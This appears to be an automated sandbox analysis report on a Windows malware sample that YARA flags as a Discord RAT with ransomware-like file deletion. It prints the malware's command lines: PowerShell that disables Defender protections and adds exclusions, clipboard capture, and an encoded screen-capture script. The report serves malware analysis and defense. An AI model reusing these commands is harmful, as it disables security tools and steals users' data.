Source: RuntimeBroker.exe, 00000007.00000003.1741045639.0000010D2F242000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000007.00000002.1776664073.0000010D2F448000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1969519599.0000016BB3BF8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: based.exe, 00000011.00000003.2132863000.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1899335631.000002A15DFF7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2001826540.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1972917790.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2040687659.000002A15DFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911515850.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910969788.000002A15DFFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: based.exe, 00000011.00000003.1876089664.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1981839613.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1960792851.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1916793337.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2027745994.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.2132628407.000002A15E035000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1961012527.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC24000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1911541145.000002A15E035000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 162.159.130.234:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud

Yara detected Discord Rat

Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a24170.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a37e08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a10508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a37e08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a10508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.RuntimeBroker2.0.exe.2227b640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a24170.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 87Bym0x4Fy.exe PID: 6912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker2.0.exe PID: 7176, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\KZWFNRXYKI.pdf
Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\VLZDGUKUTZ.docx
Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\NIKHQAIQAU.pdf
Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\UMMBDNEQBN.xlsx
Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\NWTVCDUMOB.xlsx

System Summary

Very long command line found

Source: C:\ProgramData\Microsoft\based.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\ProgramData\Microsoft\based.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Source: C:\Windows\System32\tasklist.exe	Code function: 38_2_0000016716C62B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,	38_2_0000016716C62B2C
Source: C:\Windows\System32\tasklist.exe	Code function: 38_2_0000016716C628C8 NtEnumerateValueKey,NtEnumerateValueKey,	38_2_0000016716C628C8
Source: C:\Windows\System32\tasklist.exe	Code function: 39_2_00000245E8912B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,	39_2_00000245E8912B2C
Source: C:\Windows\System32\tasklist.exe	Code function: 39_2_00000245E89128C8 NtEnumerateValueKey,NtEnumerateValueKey,	39_2_00000245E89128C8

Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe

Code function: 13_2_00B47FD3: _wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

13_2_00B47FD3

Source: C:\Windows\System32\SIHClient.exe	File created: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP2406.tmp
Source: C:\Windows\System32\SIHClient.exe	File created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP3056.tmp
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP

Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B075C74	5_2_00007FF72B075C74
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B06FBD8	5_2_00007FF72B06FBD8
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B051000	5_2_00007FF72B051000
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B060C64	5_2_00007FF72B060C64
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B061484	5_2_00007FF72B061484
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B062CC4	5_2_00007FF72B062CC4
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B058B20	5_2_00007FF72B058B20
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B070B84	5_2_00007FF72B070B84
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B0733BC	5_2_00007FF72B0733BC
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B0673F4	5_2_00007FF72B0673F4
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B078A38	5_2_00007FF72B078A38
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B060A60	5_2_00007FF72B060A60
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B061280	5_2_00007FF72B061280
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B067AAC	5_2_00007FF72B067AAC
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B07518C	5_2_00007FF72B07518C
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B0691B0	5_2_00007FF72B0691B0
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B06D200	5_2_00007FF72B06D200
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B065040	5_2_00007FF72B065040
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B061074	5_2_00007FF72B061074
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B06D880	5_2_00007FF72B06D880
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B0628C0	5_2_00007FF72B0628C0
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B075728	5_2_00007FF72B075728
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B061F30	5_2_00007FF72B061F30
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B06FBD8	5_2_00007FF72B06FBD8
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B072F20	5_2_00007FF72B072F20
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B05979B	5_2_00007FF72B05979B
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B059FCD	5_2_00007FF72B059FCD
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B060E70	5_2_00007FF72B060E70
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B074F10	5_2_00007FF72B074F10
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B06CD6C	5_2_00007FF72B06CD6C
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B0595FB	5_2_00007FF72B0595FB
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Code function: 6_2_00007FFD9B8813FB	6_2_00007FFD9B8813FB
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Code function: 6_2_00007FFD9B8813D3	6_2_00007FFD9B8813D3
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Code function: 6_2_00007FFD9B88133C	6_2_00007FFD9B88133C
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B075C74	7_2_00007FF72B075C74
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B051000	7_2_00007FF72B051000
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B060C64	7_2_00007FF72B060C64
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B061484	7_2_00007FF72B061484
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B062CC4	7_2_00007FF72B062CC4
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B058B20	7_2_00007FF72B058B20
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B070B84	7_2_00007FF72B070B84
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B0733BC	7_2_00007FF72B0733BC
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B0673F4	7_2_00007FF72B0673F4
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B06FBD8	7_2_00007FF72B06FBD8
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B078A38	7_2_00007FF72B078A38
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B060A60	7_2_00007FF72B060A60
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B061280	7_2_00007FF72B061280
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B067AAC	7_2_00007FF72B067AAC
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B07518C	7_2_00007FF72B07518C
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B0691B0	7_2_00007FF72B0691B0
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B06D200	7_2_00007FF72B06D200
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B065040	7_2_00007FF72B065040
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B061074	7_2_00007FF72B061074
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B06D880	7_2_00007FF72B06D880
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B0628C0	7_2_00007FF72B0628C0
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B075728	7_2_00007FF72B075728
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B061F30	7_2_00007FF72B061F30
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B06FBD8	7_2_00007FF72B06FBD8
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B072F20	7_2_00007FF72B072F20
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B05979B	7_2_00007FF72B05979B
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B059FCD	7_2_00007FF72B059FCD
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B060E70	7_2_00007FF72B060E70
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B074F10	7_2_00007FF72B074F10
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B06CD6C	7_2_00007FF72B06CD6C
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B0595FB	7_2_00007FF72B0595FB
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FFE0C0B7508	7_2_00007FFE0C0B7508
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B49906	13_2_00B49906
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B4F963	13_2_00B4F963
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B5EA07	13_2_00B5EA07
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B58C7E	13_2_00B58C7E
